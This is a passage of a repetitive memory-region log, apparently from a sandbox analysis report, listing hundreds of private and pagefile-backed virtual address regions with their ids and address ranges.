0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18232 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18233 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18234 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18235 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18236 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18237 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18238 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18239 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18240 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18241 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18242 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18243 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18244 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18245 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18246 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18247 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18248 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18249 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18250 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18251 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18252 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18253 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18254 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18255 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18256 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18257 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18258 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18259 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18260 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18261 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18262 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18263 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18264 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18265 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18266 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18267 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18268 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18269 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18270 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18271 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18272 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18273 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18274 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18275 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18276 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18277 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18278 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18279 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18280 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18281 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18282 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18283 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18284 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 18285 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18286 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18287 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18288 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18289 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18290 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18291 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18292 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18293 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18294 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18295 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18296 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18297 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18298 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18299 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18300 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18301 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18302 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18303 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18304 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18305 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18306 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18307 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18308 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 18309 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18310 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18311 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18312 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18313 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18314 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18315 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18316 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18317 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18318 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18319 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18320 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18321 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18322 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18323 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18324 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18325 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18326 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18327 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18328 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18329 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18330 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18331 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18332 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18333 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18334 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18335 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18336 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18337 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18338 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18339 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18340 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18341 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18342 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18343 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18344 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18345 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18346 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18347 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18348 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18349 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18350 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18351 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18352 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18353 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18354 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18355 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18356 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18357 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18358 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18359 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18360 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18361 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18362 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18363 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18364 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18365 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18366 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18367 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18368 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18369 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18370 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18371 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18372 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18373 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18374 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18375 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18376 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18377 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18378 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18379 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18380 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18381 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18382 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18383 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18384 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18385 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18386 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18387 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18388 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18389 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18390 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18391 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18392 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18393 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18394 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18395 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18396 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18397 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18398 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18399 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18400 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18401 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18402 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18403 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18404 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18405 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18406 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18407 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18408 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18409 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18410 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18411 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18412 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18413 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18414 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18415 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18416 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18417 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18418 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18419 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18420 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18421 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed 